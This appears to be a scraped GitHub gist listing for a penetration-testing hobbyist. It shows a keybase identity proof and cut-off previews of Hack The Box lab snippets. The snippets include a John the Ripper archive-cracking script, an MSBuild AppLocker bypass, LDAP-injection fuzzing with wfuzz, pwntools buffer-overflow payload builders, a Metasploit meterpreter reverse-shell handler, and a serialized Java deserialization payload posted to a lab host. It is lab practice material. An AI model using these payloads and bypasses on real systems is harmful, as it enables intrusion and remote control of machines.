I hereby claim:
- I am cdowns71 on github.
- I am dualfade (https://keybase.io/dualfade) on keybase.
- I have a public key ASDxw8oJN09Hj6abWb9Vc-BggpenCuRcRRWNa3j1r04UQwo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
https://gist.githubusercontent.com/bcoles/421cc413d07cd9ba7855/raw/fd8b6f0d63f88c334beb45d2615c8097f06743b6/7zip-jtr.sh | |
#!/bin/bash | |
# 7zip-JTR Decrypt Script | |
# | |
# Clone of JTR Decrypt Scripts by synacl modified for 7zip | |
# - RAR-JTR Decrypt Script - https://synacl.wordpress.com/2012/02/10/using-john-the-ripper-to-crack-a-password-protected-rar-archive/ | |
# - ZIP-JTR Decrypt Script - https://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/ | |
echo "7zip-JTR Decrypt Script"; | |
if [ $# -ne 2 ] |
https://github.com/jpillora/chisel | |
┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master] | |
└[~/go/src/github.com/jpillora/chisel]> cd $GOPATH/src/github.com/jpillora/chisel | |
┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master] | |
└[~/go/src/github.com/jpillora/chisel]> go build | |
┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master] | |
└[~/go/src/github.com/jpillora/chisel]> ls -l chisel | |
-rwxr-xr-x 1 cdowns cdowns 10539193 Jan 28 04:24 chisel* | |
┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master] |
//Applocker bypass - Windows 2016 (Build 14393) x64 | |
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SoiYtuH7.xml | |
//Microsoft (R) Build Engine version 4.6.1586.0 | |
//[Microsoft .NET Framework, version 4.0.30319.42000] | |
//Copyright (C) Microsoft Corporation. All rights reserved. | |
//Build started 2/5/2019 8:55:26 PM. | |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj --> |
./wfuzz -c -s 1 -z file,/home/cdowns/Documents/Hack_The_Box/CTF/ldap_attributes_all.txt,double,urencode -d 'inputUsername=ldapuser%2529%2528FUZZ%253D%252A&inputOTP=password' --hw 233 -u 'http://10.10.10.122/login.php' -p 127.0.0.1:8080 | |
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. | |
******************************************************** | |
* Wfuzz 2.3.4 - The Web Fuzzer * | |
******************************************************** | |
Target: http://10.10.10.122/login.php | |
Total requests: 2026 |
/home/cdowns/Github/JohnTheRipper/run/./zip2john exploitme.zip > exploitme.john | |
ver 2.0 efh 5455 efh 7875 exploitme.zip/membermanager PKZIP Encr: 2b chk, TS_chk, cmplen=3166, decmplen=10224, crc=32B64CF9 | |
ver 2.0 efh 5455 efh 7875 exploitme.zip/memo PKZIP Encr: 2b chk, TS_chk, cmplen=3775, decmplen=13304, crc=FC9CDB4F | |
NOTE: It is assumed that all files in each archive have the same password. | |
If that is not the case, the hash may be uncrackable. To avoid this, use | |
option -o to pick a file at a time. | |
4 CORE OPTINON -- | |
NO POINT IN CRUSHING MY 8 CORES INO THE GROUND -- |
#!usr/bin/env python | |
import struct | |
from pwn import * | |
def gen_payload(start_addr, shellcode): | |
context.arch='amd64' | |
# Opcode for the NOP instruction | |
nop = asm('nop', arch="amd64") | |
nop1 = nop*72 # Create first NOP sled | |
#!/usr/bin/env python | |
from struct import * | |
# bytes 400 -- | |
buf = "" | |
# offset to RIP | |
buf += "A"*72 | |
# overwrite RIP -- |
MODIFIED VEIL HANDLER -- | |
msfc -r /var/lib/veil/output/handlers/3fb7Jq79.rc | |
/* | |
use exploit/multi/handler | |
set PAYLOAD windows/x64/meterpreter/reverse_tcp | |
set LHOST 10.10.14.13 | |
set LPORT 3434 | |
set ExitOnSession false | |
exploit -j |
import hashlib | |
import hmac | |
import base64 | |
import requests | |
url = 'http://10.10.10.130:8080/userSubscribe.faces' | |
# re check the payload maybe generate it from kali (ysoserial pipe to base64) and make sure it is java 8 in order for it to work. | |
payload = 'rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAA3NyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIABEkACmxpbmVOdW1iZXJMAA5kZWNsYXJpbmdDbGFzc3EAfgAFTAAIZmlsZU5hbWVxAH4ABUwACm1ldGhvZE5hbWVxAH4ABXhwAAAAU3QAJnlzb3Nl |